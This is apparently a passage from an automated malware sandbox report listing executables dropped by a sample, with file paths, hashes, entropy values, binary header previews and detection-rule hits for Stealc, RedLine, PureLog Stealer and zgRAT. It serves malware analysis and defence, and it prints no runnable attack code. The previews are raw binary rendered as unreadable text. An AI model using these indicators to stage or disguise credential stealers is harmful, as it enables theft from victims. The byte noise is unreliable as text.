                                                                          MD5:BB4417D907E43503F714273F1AE9CF44
                                                                          SHA1:973FF5333F859FCF8FD7281509A9BD19D155D82C
                                                                          SHA-256:A1A117E8110FACA90E94F5EDD93E0AD4A5D7F49485E30BFA332DB573464C7908
                                                                          SHA-512:AB80A72C2E805052084FFC360D9189DB4F5F5797C36ADE71D09A951843455D936FCFF18E85819B48DBA82332F142B34C26320F8D1CE8DF08874829B276BC3018
                                                                          Malicious:true
                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):192000
                                                                          Entropy (8bit):6.395265378509869
                                                                          Encrypted:false
                                                                          SSDEEP:3072:QJlVTFj5qDao8KaxfE54HnnGSail+bOX8bX60UFHJKa:QJP5j5Ka2aOanGSabY860UFpKa
                                                                          MD5:7A02AA17200AEAC25A375F290A4B4C95
                                                                          SHA1:7CC94CA64268A9A9451FB6B682BE42374AFC22FD
                                                                          SHA-256:836799FD760EBA25E15A55C75C50B977945C557065A708317E00F2C8F965339E
                                                                          SHA-512:F6EBFE7E087AA354722CEA3FDDD99B1883A862FB92BB5A5A86782EA846A1BFF022AB7DB4397930BCABAA05CB3D817DE3A89331D41A565BC1DA737F2C5E3720B6
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L......f.....................B"......d............@..........................0$...........@....................................<.............................#..$...................................................................................text...J........................... ....rdata..............................@..@.data....+!.........................@....reloc..*D....#..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):4278784
                                                                          Entropy (8bit):7.1283818624071476
                                                                          Encrypted:false
                                                                          SSDEEP:98304:if7X0ZueTTPs6deIF+iHtcbBt2VSFjUCaZ:8bPeVdeIMiHmbeVS
                                                                          MD5:7FA5C660D124162C405984D14042506F
                                                                          SHA1:69F0DFF06FF1911B97A2A0AA4CA9046B722C6B2F
                                                                          SHA-256:FD3EDFAFF77DD969E3E0D086495E4C742D00E111DF9F935ED61DFBA8392584B2
                                                                          SHA-512:D50848ADBFE75F509414ACC97096DAD191AE4CEF54752BDDDCB227FFC0F59BFD2770561E7B3C2A14F4A1423215F05847206AD5C242C7FD5B0655EDF513B22F6C
                                                                          Malicious:true
                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*......................8.....L.............@...........................A..................@..............................x"... ....7..................`..@............................P......................................................CODE................................ ..`DATA.... -..........................@...BSS......................................idata..x".......$..................@....tls.........@...........................rdata.......P......................@..P.reloc..@....`......................@..P.rsrc.....7.. ....7.................@..P..............A......JA.............@..P........................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):419328
                                                                          Entropy (8bit):6.1177703153619465
                                                                          Encrypted:false
                                                                          SSDEEP:6144:hVPD7/k5hjsld/TWx3EY9lwXtaW1G4kM0u0b2KrqBDW:hVPHXM31SC4kVu0rGB6
                                                                          MD5:A21700718C70EC5E787AD373CB72A757
                                                                          SHA1:027554AB5FF3245E7617F3B83D6548BF7919F92E
                                                                          SHA-256:87E639ECC7704CB5E29F1EBB1D8ADE3AE863AAA2505A37B28F2D45121DA500C6
                                                                          SHA-512:EA292A5442D9FE536E650A2BC5142DD3AEF79C66930243897E0E87C57915F0A54E45E03E58DAFFB473F85FE10B963D4670050BFF5AB3F91121D21D463E25659B
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: Joe Security
                                                                          • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, Author: ditekSHen
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..J...........h... ........@.. ....................................@.................................`h..K.................................................................................... ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............d..............@..B.................h......H........[...............................................................*...(....(....*.0...........s........~....%:....&~......&...s....%.....(...+o.....8[....o...............%..F~2...(.....%..G~2...(.....%..H~2...(.....%..e~2...(.....~3...(.......o......8......(......s.......s........~....}....~...........s....(....o....}......{.....I~2...(....o........9......I~2...(.......8C........~2...(....o....:......{....~4...(....8......{....~5...(.........(...........9........o.....
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):321536
                                                                          Entropy (8bit):7.984064781404801
                                                                          Encrypted:false
                                                                          SSDEEP:6144:/6ZNaeEuexVOkKu/A9UZMOqMVr57KLMLPQ5uRXg6hUm8:/BvOkHPEUsYLeIXgDm8
                                                                          MD5:FF5AFED0A8B802D74AF1C1422C720446
                                                                          SHA1:7135ACFA641A873CB0C4C37AFC49266BFEEC91D8
                                                                          SHA-256:17AC37B4946539FA7FA68B12BD80946D340497A7971802B5848830AD99EA1E10
                                                                          SHA-512:11724D26E11B3146E0FC947C06C59C004C015DE0AFEA24EC28A4EB8145FCD51E9B70007E17621C83F406D9AEB7CD96601245671D41C3FCC88A27C33BD7CF55AC
                                                                          Malicious:true
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.f................................. ........@.. .......................@............`.....................................W............................ ......|................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H..........................................................................h7....c73..w..V)J.:..a.W'.=.|...Q&.....p....IIoO...g...Q...P.~CM...v@.P*..Sl....a=..:u?ED."..Jp....2..r.B..H...?.v..0]2.....>..F.}.s6..N...h.#.....Z.6..g^gu.aW&.2.n?.v..*.S...}.!.^..E.h.dp.....fc4{../O..I....v.Q,U...>xK..c.D.../..E7...T...t......y...f..SC....).F.m."2...Ms.3"KL.e..zc.Bb.-.l.\......TYQ..B!.......?.......e]4...../(5......5...4.......'.[.g$.....gb;e..Q..r.Ge(a<..qC.J
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):360448
                                                                          Entropy (8bit):6.667690093536603
                                                                          Encrypted:false
                                                                          SSDEEP:6144:yEIbJdhhk012D9kEsrwRdvwoShfvM4MH0RoeAcGho33vXvIKgI5TdFaA51TIrxLD:yEIbJvhk0azddWtyA51C09ssEN8mhGfp
                                                                          MD5:2F1D09F64218FFFE7243A8B44345B27E
                                                                          SHA1:72553E1B3A759C17F54E7B568F39B3F8F1B1CDBE
                                                                          SHA-256:4A553C39728410EB0EBD5E530FC47EF1BDF4B11848A69889E8301974FC26CDE2
                                                                          SHA-512:5871E2925CA8375F3C3CE368C05EB67796E1FBEC80649D3CC9C39B57EE33F46476D38D3EA8335E2F5518C79F27411A568209F9F6EF38A56650C7436BBAA3F909
                                                                          Malicious:true
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...<..f..........................................@..........................@............@.....................................x................................H...................................................................................text.............................. ..`.rdata...).......*..................@..@.data...X........^..................@....reloc...H.......J...6..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):311296
                                                                          Entropy (8bit):5.082545442352462
                                                                          Encrypted:false
                                                                          SSDEEP:3072:Eq6EgY6iArUjOvWUJwPYT8QADFKoRJTA+tJSiK1cZqf7D34leqiOLibBOT:vqY6iULwP/xnRJTAKJ81cZqf7DIvL
                                                                          MD5:58E8B2EB19704C5A59350D4FF92E5AB6
                                                                          SHA1:171FC96DDA05E7D275EC42840746258217D9CAF0
                                                                          SHA-256:07D4B7768E13D79AC5F05F81167B29BB6FBF97828A289D8D11EEC38939846834
                                                                          SHA-512:E7655762C5F2D10EC246D11F82D437A2717AD05BE847B5E0FD055E3241CAACA85430F424055B343E3A44C90D76A0BA07A6913C2208F374F59B61F8AA4477889F
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, Author: Joe Security
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0................. ... ....@.. ....................... ............@.....................................O.... ..............................h................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):986112
                                                                          Entropy (8bit):7.987134427472388
                                                                          Encrypted:false
                                                                          SSDEEP:24576:6MGVJ/Oap+Bh45LEwaV1QghDHm5GQTSmGg:6NJ/jpi5waVhjm5GQ2m7
                                                                          MD5:1EF39C8BC5799AA381FE093A1F2D532A
                                                                          SHA1:57EABB02A7C43C9682988227DD470734CC75EDB2
                                                                          SHA-256:0CCED5B50789FCA3AD4B2C151B798363D712DA04C377BD704DCEF4898E66B2B4
                                                                          SHA-512:13A9C267C4CEB2BD176F1339FAA035FFEB08936DEEEB4E38252EA43CFE487EA1C1876E4CC2A965548E767AF02805A1DA62885E6538DA056BE0C6FAE33B637682
                                                                          Malicious:true
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'1.f.............................!... ...@....@.. ....................................`.................................(!..W....@..`....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................d!......H.......P....G...........U.............................................."..(....*...>..(.....oV...&*.s.........*.0..........(.........(....o....3.(....-..j*~....%..(....~....o.......j@8...(......s.......o........&..o ...s!.........o".....,...i-....,...o#....($.....o%...o&...o#........(....(......(..........c.o'.......o'........c.o'.......c.o'.......o'........c.o'........c.o'........c.o'....o(......j....+)....o)...nX.....bX.....da.....o*......X......3....bX.....da.....bX....!.
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):367616
                                                                          Entropy (8bit):7.989212623944353
                                                                          Encrypted:false
                                                                          SSDEEP:6144:A9qV5P6oqa2R9xVnirCMSaMp1iXh7Dvnj+c60jNyRBEKjbXIEloBTOZu:AOB2Rx8/4p1ix/njn9knbvlo
                                                                          MD5:6B470F7251AA9C14D7DAEA8F6446E217
                                                                          SHA1:A256C54D4DD7E0A7A1582D8FDFEF5807BC3C4AF4
                                                                          SHA-256:8B9097B795D42C49C3B2C560714226361671A3F1D711FAA9AEAEE20E22E7095F
                                                                          SHA-512:FDC553C9D2FF19343DD99B0B34C875752DF4FA0CBD494096AEB51D859BD102448F1A5043A53A808045AE52077F180546A134B1AA69DB4DC04AFF2610FADEACA4
                                                                          Malicious:true
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................>.... ........@.. ....................................`....................................S.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H......................................................................_..d...K...Sk..+G....Q............J.nj.I.k..)..E&E.8_.b...$..........(#?o8.....b.9....~V.4..v1.uT.0....^...Lb........;...5.H..^.1.|<..`y54...f.~..Y,.S,..Wp.S[6....Nk.E..^...i&........?on....~!.6A...A....J..n..x.T.H.a......z...c.W...n.g#u.>.A...6K.qcR.9.L..;.z.s<...j.|.......I:.w..H$...z.]MH..ChD.y.>.o..l.....MA]~......o\Z.1.D.#Khy..Ov.EMA9Y...A.e.8..E...2..&_.......V.H.I...D#.......#M.Lq
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1827328
                                                                          Entropy (8bit):7.946055880339516
                                                                          Encrypted:false
                                                                          SSDEEP:49152:qFCMAksd1M9uacULmOrLwlNwgbHsx3gLE72rlqJr:9Xd1QutGmE+NZHS32rl
                                                                          MD5:904925A03F5E62B7B67EE30D22E9C7CF
                                                                          SHA1:ACEC73D1E47B2DDDF74ADDC3529345254135062F
                                                                          SHA-256:D5F6C82D696B68C10F33762A2FD0628AFD233B0D07C99654B186F699446D990B
                                                                          SHA-512:688660F97C278E2FAD8167AF3C75CCF41E432D7962F0EA242B01D410026541FB140F723A1A42622515C987B692E207C79EB83493CCE7BA73F189CF83E2A4FEA3
                                                                          Malicious:true
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L.../..f......................$......`i...........@...........................i.....v.....@.................................P.%.d.............................%..................................................................................... . ..%......(..................@....rsrc ......%......8..............@....idata ......%......8..............@... ..)...%......:..............@...niikbxzg......O..~...<..............@...nnynhmhk.....Pi.....................@....taggant.0...`i.."..................@...................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1929728
                                                                          Entropy (8bit):7.951250240981363
                                                                          Encrypted:false
                                                                          SSDEEP:49152:8lRNijSZ6fzUmuGLLv7CUBhp2skHe4LpFC/:8bNo7UJGLoHJj
                                                                          MD5:E0828E289DFBD343733236C6CFCEE121
                                                                          SHA1:D55235AAE5323348069AD77A8EDCD77D5E45D2A7
                                                                          SHA-256:C1C76C99FF4C06D6B9E252D52B397A0FA281E1AA1A51555193324DECFC0CBCA8
                                                                          SHA-512:CC1940ED569D48AB671E16B05CD2A34E03485220A25ABDD3F8E4D615717A6EE4465368B929BA18563CDB051A39DF803CEBD545FFAA8B07B6E07FDBF42E1849C4
                                                                          Malicious:true
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................L...........@...........................L......`....@.................................W...k.............................L.............................@.L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...ewzoukzh.`...02..X..................@...eahzsgud......L......L..............@....taggant.0....L.."...P..............@...................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3643904
                                                                          Entropy (8bit):6.674553235078717
                                                                          Encrypted:false
                                                                          SSDEEP:49152:KXSBgOQSMWnpCkICTugfaU6vTN4Z6WSk7s7jsjS4znnqyIn7TrvU:KygOQSVpC/CHMTWk8zn
                                                                          MD5:B3FD0E1003B1CD38402B6D32829F6135
                                                                          SHA1:C9CEDD6322FB83457F56B64B4624B07E2786F702
                                                                          SHA-256:E4A36BE98F730D706D2CA97A5D687329A1CC7D4848DAF698B7E21B6B9B577F31
                                                                          SHA-512:04692E0F80A75F78B533677CEFE3DB6607108ABF19963D88E231925CFA13F1EC054811AEBE53C82D238E732A999CD8D176107D50CF2EA5694D4177CBFD3B30F1
                                                                          Malicious:true
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........................\#..<........... ....@...... ........................7...........`...@......@............... ................................#..:........................................................................................... ..H............text....[#.. ...\#................. ..`.rsrc....:....#..<...^#.............@..@........................................H.......X.".T.......N........-"..........................................~....Pt.f..L^[1.w.u......BZ.F...!....-.(...E..!l.|.I..I.........f.9....H....OO._9XB....CR.....n|kh.^..rl.y...~....`..Z...B...(.e._.p......F..j.gZ4p...h....Hy.7P6.Q..)9.2y.:...n.Fb.zW...\..cl....]...1.w...-...(....6i(.. ......U.r...g@..N..=q....].'...d....... ...plW!r._....D.x.q_.-.....<.F.sQ#ix.L....+..,b.."..W.......6h...\...d....0...`\.>.....1wlRln(}*...h...c......}:...a....b..9I.,.......P..szo.|j
                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1973760
                                                                          Entropy (8bit):7.9495630479940464
                                                                          Encrypted:false
                                                                          SSDEEP:49152:GJd564fdAN+fobpaJztfWOoh1jpt1zeO67:khgfb8tt/oNtcOI
                                                                          MD5:49A9681922AD571A4A24B42465E5CDC4
                                                                          SHA1:F710153121BCDE5E6ACD4760001D916675973475
                                                                          SHA-256:C66B9636DF8B16D69170B47F28611D70194925CD941C0A7ED49A6F35A599DAD6
                                                                          SHA-512:ADCB2E990A433E69468C21BC2F0089D147AAD354BB3D637F280383F5D31913F4AD80A8C121A565A89B36946DF0DF02B142955681E257DD4BCA66470146B976F3
                                                                          Malicious:true
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................`N...........@...........................N.....2.....@.................................W...k............................AN..............................AN..................................................... . ............................@....rsrc...............................@....idata ............................@... ..,.........................@...ukgzfzxu.....@3.....................@...svxbhzsv.....PN.....................@....taggant.0...`N.."..................@...........................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):2662
                                                                          Entropy (8bit):7.8230547059446645
                                                                          Encrypted:false
                                                                          SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                          MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                          SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                          SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                          SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                          Malicious:false
                                                                          Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):2662
                                                                          Entropy (8bit):7.8230547059446645
                                                                          Encrypted:false
                                                                          SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                          MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                          SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                          SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                          SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                          Malicious:false
                                                                          Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):2662
                                                                          Entropy (8bit):7.8230547059446645
                                                                          Encrypted:false
                                                                          SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                          MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                          SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                          SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                          SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                          Malicious:false
                                                                          Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                          Process:C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):2662
                                                                          Entropy (8bit):7.8230547059446645
                                                                          Encrypted:false
                                                                          SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                          MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                          SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                          SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                          SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                          Malicious:false
                                                                          Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):2662
                                                                          Entropy (8bit):7.8230547059446645
                                                                          Encrypted:false
                                                                          SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                          MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                          SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                          SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                          SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                          Malicious:false
